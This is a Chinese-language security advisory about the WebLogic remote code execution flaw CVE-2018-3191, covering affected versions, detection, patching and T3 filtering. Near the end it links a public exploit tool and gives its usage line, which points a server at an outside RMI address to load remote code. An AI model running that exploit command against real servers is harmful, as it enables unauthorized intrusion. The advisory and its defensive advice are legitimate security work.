一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具



1.1背景

北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击网络服务器被攻击者接受,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,李正东申报通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致。

有人已经复现成功



而且发现已经被灰产写成批量入侵工具,还在服务器上跑着呢!



所以呢,有一大波肉鸡在路上,如果你不想成为肉鸡,尽快修复!

1.2漏洞编号

CVE-2018-3191

1.3漏洞等级

高危

二、修复建议

2.1受影响版本

WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3

2.2漏洞检测

检查WebLogic的版本号是否为受影响版本。

检查是否开启了WebLogic的T3服务。

2.3解决方案

Oracle官方已经在本次的关键补丁更新(CPU)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

1.过滤T3协议
2.设置Nginx反向代理
3.升级到最新JDK

JEP290(JDK8u121,7u131,6u141)

工具指定要带着的:

https://github.com/voidfyoo/CVE-2018-3191/releases
https://github.com/voidfyoo/CVE-2018-3191

用法:
java -jar weblogic-spring-jndi.jar <jndi_address>
例如
java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp
笔记

weblogic-spring-jndi-12.2.1.3.jar 对于weblogic:

    12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar 对于weblogic:

    10.3.6.0

    12.2.1.0

    12.1.3.0

    12.2.1.1
免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐